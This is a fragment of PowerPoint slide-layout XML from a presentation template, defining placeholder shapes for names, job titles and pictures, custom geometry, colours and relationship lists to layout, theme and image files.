          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr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John Smith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0EA49B31-B04C-AE21-16AD-EE0C61012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066639" y="2482903"/>
            <a:ext cx="3568595" cy="3568595"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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6C7B98D6-B1EE-1642-3E37-0A80314352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385038" y="7075170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949CA1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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4E874517-08B6-7424-7B50-FA4C4FD730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85038" y="7562852"/>
            <a:ext cx="2972859" cy="3657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rgbClr val="949CA1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="966842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-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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04CDD9CF-99EA-93F8-0488-62825A416283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3793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53793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2399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92399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6" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63684CCA-0B09-1D6C-49CA-47679739B95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890734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7" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC6EE22C-AD67-9662-BC20-E716D60E94D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115300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763FF8ED-FC0A-7A72-712A-C572551F7C3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301268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675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- icon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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04CDD9CF-99EA-93F8-0488-62825A416283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25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3793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53793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2399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92399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6" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63684CCA-0B09-1D6C-49CA-47679739B95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890734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7" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC6EE22C-AD67-9662-BC20-E716D60E94D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115300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763FF8ED-FC0A-7A72-712A-C572551F7C3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301268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41071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-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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A12C4E-DA69-FA37-FF05-4391289CADBC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2A863C4-EE50-C944-62F5-23F9B7DF4C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95D6E87-A13D-F566-D62D-EB57A53FFE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4D65F5C-279D-1C32-AB79-DE7A980F5F2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C24A49B-8A2A-01E4-1C90-B689E2623C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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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620309B-D431-8C59-4EBC-F88AAD774DB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55568-8BF1-6077-6CC0-55CE0032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0047EC7F-2055-2B5D-763B-0E495C6C015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614186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375504B-3473-87CF-CD36-1DC25335C1F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948262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C7307972-992B-FB4F-8AC2-194E14BDA5E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0282338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DEAFCF0E-932D-33E3-7F0C-234D1E69AE0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4616414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351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 - icon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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A12C4E-DA69-FA37-FF05-4391289CADBC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25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2A863C4-EE50-C944-62F5-23F9B7DF4C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95D6E87-A13D-F566-D62D-EB57A53FFE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4D65F5C-279D-1C32-AB79-DE7A980F5F2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C24A49B-8A2A-01E4-1C90-B689E2623C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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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620309B-D431-8C59-4EBC-F88AAD774DB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6811294"/>
            <a:ext cx="3533172" cy="36373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55568-8BF1-6077-6CC0-55CE0032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0047EC7F-2055-2B5D-763B-0E495C6C015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614186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375504B-3473-87CF-CD36-1DC25335C1F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948262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C7307972-992B-FB4F-8AC2-194E14BDA5E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0282338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DEAFCF0E-932D-33E3-7F0C-234D1E69AE0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4616414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781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- icons turq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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04CDD9CF-99EA-93F8-0488-62825A416283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/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3793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53793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192399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92399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6" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63684CCA-0B09-1D6C-49CA-47679739B95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890734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7" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC6EE22C-AD67-9662-BC20-E716D60E94D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115300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763FF8ED-FC0A-7A72-712A-C572551F7C3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301268" y="3457639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rgbClr val="F4F5F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47410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cols - icons turq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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A12C4E-DA69-FA37-FF05-4391289CADBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="4844954" cy="4292499"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1478759"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1310141"/>
              <a:gd name="connsiteX1" fmla="*/ 1474186 w 1478759"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1310141"/>
              <a:gd name="connsiteX2" fmla="*/ 1478752 w 1478759"/>
              <a:gd name="connsiteY2" fmla="*/ 67625 h 1310141"/>
              <a:gd name="connsiteX3" fmla="*/ 1456512 w 1478759"/>
              <a:gd name="connsiteY3" fmla="*/ 237013 h 1310141"/>
              <a:gd name="connsiteX4" fmla="*/ 1456452 w 1478759"/>
              <a:gd name="connsiteY4" fmla="*/ 237254 h 1310141"/>
              <a:gd name="connsiteX5" fmla="*/ 1456391 w 1478759"/>
              <a:gd name="connsiteY5" fmla="*/ 237494 h 1310141"/>
              <a:gd name="connsiteX6" fmla="*/ 1066803 w 1478759"/>
              <a:gd name="connsiteY6" fmla="*/ 694260 h 1310141"/>
              <a:gd name="connsiteX7" fmla="*/ 1002633 w 1478759"/>
              <a:gd name="connsiteY7" fmla="*/ 731306 h 1310141"/>
              <a:gd name="connsiteX8" fmla="*/ 1002573 w 1478759"/>
              <a:gd name="connsiteY8" fmla="*/ 731306 h 1310141"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1478759"/>
              <a:gd name="connsiteY9" fmla="*/ 1310141 h 131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759" h="1310141">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1474186" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1478752" y="67625"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1479016" y="121559"/>
                  <a:pt x="1472329" y="177985"/>
                  <a:pt x="1456512" y="237013"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1456452" y="237073"/>
                  <a:pt x="1456452" y="237254"/>
                  <a:pt x="1456452" y="237254"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1456391" y="237314"/>
                  <a:pt x="1456391" y="237434"/>
                  <a:pt x="1456391" y="237494"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1393124" y="473545"/>
                  <a:pt x="1224190" y="600621"/>
                  <a:pt x="1066803" y="694260"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1002633" y="731306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002573" y="731306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1310141"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="87CFD3">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="31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1129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2A863C4-EE50-C944-62F5-23F9B7DF4C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95D6E87-A13D-F566-D62D-EB57A53FFE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376" y="681129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4D65F5C-279D-1C32-AB79-DE7A980F5F2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C24A49B-8A2A-01E4-1C90-B689E2623C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44452" y="681129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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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5940578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620309B-D431-8C59-4EBC-F88AAD774DB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878528" y="6811294"/>
            <a:ext cx="353317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>
                <a:solidFill>
                  <a:srgbClr val="87CFD3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55568-8BF1-6077-6CC0-55CE0032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rgbClr val="F4F5F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0047EC7F-2055-2B5D-763B-0E495C6C015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614186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375504B-3473-87CF-CD36-1DC25335C1F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948262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C7307972-992B-FB4F-8AC2-194E14BDA5E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0282338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DEAFCF0E-932D-33E3-7F0C-234D1E69AE0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4616414" y="3496030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88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rix icon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9ECF600E-3403-0F77-1C06-1AEC7095FF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effectLst>
            <a:outerShdw blurRad="12700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4309742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2A863C4-EE50-C944-62F5-23F9B7DF4C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10376" y="4309742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4D65F5C-279D-1C32-AB79-DE7A980F5F2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44452" y="4309742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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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878528" y="4309742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55568-8BF1-6077-6CC0-55CE0032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rgbClr val="F4F5F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0047EC7F-2055-2B5D-763B-0E495C6C015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614186" y="2336335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375504B-3473-87CF-CD36-1DC25335C1F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948262" y="2336335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C7307972-992B-FB4F-8AC2-194E14BDA5E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0282338" y="2336335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DEAFCF0E-932D-33E3-7F0C-234D1E69AE0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4616414" y="2336335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C5B626ED-B8BF-6BB1-7330-608A3115D85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6300" y="8101265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B202124-8F60-B73F-A222-8A7ED50BE10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10376" y="8101265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473F829-A084-614A-8120-CFDA107B880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544452" y="8101265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6234390E-D8A8-1F96-E0EF-0937EBD914C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878528" y="8101265"/>
            <a:ext cx="3533172" cy="667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>
                <a:solidFill>
                  <a:srgbClr val="F4F5F4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78E704C2-B9EF-A90E-CF03-A860912265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614186" y="6127858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1" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{485B8A9C-1806-7F57-BE22-A6900A63EF8D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5948262" y="6127858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2" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCB7629-2DD9-C4AD-F097-2E37D8AF69A3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0282338" y="6127858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23" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96DD1752-407A-8B74-2C7A-D1DA14FB061B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4616414" y="6127858"/>
            <a:ext cx="2057400" cy="1700784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:noFill/>
          </a:ln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614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28140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28140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318052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318052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2BC72547-8891-B182-CD10-DF74AAEE8FD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28140" y="3940638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06C9AC9-EA73-2C76-6F33-7D8C21BA6E3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3096" y="3908243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119E133-4D50-B36E-1BCB-93AC1E9DD58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18052" y="3908243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A5A4B7-296D-DB16-E8E3-D2C27A5FF0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="3908243"/>
            <a:ext cx="0" cy="3477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EF29002-1EF9-3A87-5666-EDB308948BE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11813177" y="3908243"/>
            <a:ext cx="0" cy="3477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464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 Numbers dark">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="0A1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4FBA57-0EE8-A6F7-06A3-82AAA1075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28140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789D78C-59EF-F8D5-BD32-549BF50A0D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28140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D1FA6C6-85C4-E326-E75A-320B9AF91A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096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7EFCBF1-9D96-B03F-5E66-F2152547EE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3096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DA8D324-8929-C934-45F2-3F8A71FD30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318052" y="6007658"/>
            <a:ext cx="4275138" cy="7347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F8CA863-2928-4152-968B-0B577CAE98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318052" y="6893587"/>
            <a:ext cx="4275138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600">
                <a:solidFill>
                  <a:srgbClr val="949CA1"/>
                </a:solidFill>
                <a:latin typeface="+mn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B1B4F-F67C-56D4-97B6-86BD3DDF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876301"/>
            <a:ext cx="15773400" cy="846174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2BC72547-8891-B182-CD10-DF74AAEE8FD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28140" y="3940638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06C9AC9-EA73-2C76-6F33-7D8C21BA6E3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3096" y="3908243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119E133-4D50-B36E-1BCB-93AC1E9DD58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18052" y="3908243"/>
            <a:ext cx="4275138" cy="1630822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="254000" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:srgbClr val="004B55">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr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58%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A5A4B7-296D-DB16-E8E3-D2C27A5FF0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="3908243"/>
            <a:ext cx="0" cy="3477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EF29002-1EF9-3A87-5666-EDB308948BE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11813177" y="3908243"/>
            <a:ext cx="0" cy="3477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070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04.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout99.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout120.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout125.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout141.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout146.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout162.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.svg"/><Relationship Id="rId1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89.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout110.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout115.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout131.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout136.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout152.xml"/><Relationship Id="rId79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92.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout100.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout105.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout108.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout113.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout121.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout126.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout134.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout142.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout147.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout155.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout86.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout129.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout150.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout158.xml"/><Relationship Id="rId85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95.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout103.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout111.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout116.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout124.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout137.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout145.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout98.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout119.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout132.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout140.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout148.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout153.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout161.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png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3.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout101.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout106.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout114.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout127.xml"/><Relationship Id="rId57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88.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout109.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout122.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout130.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout138.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout143.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout151.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout156.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout159.xml"/><Relationship Id="rId86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1.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout96.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout117.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout112.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout128.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout133.xml"/><Relationship Id="rId76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85.xml"/><Relationship Id="rId71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80.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout107.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout102.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout118.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout123.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout144.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme2.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout139.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout160.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout97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77.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout182.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout190.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout185.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout198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17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout181.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout189.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout197.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout166.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout180.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout184.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout193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24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout188.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout196.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout201.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout169.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout179.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout187.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout192.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout200.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout174.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout183.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout195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Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout178.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout186.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout191.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout194.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout199.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout172.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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1EA39082-8C53-B568-AF5F-879947A8436D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId80">
            <a:extLst>
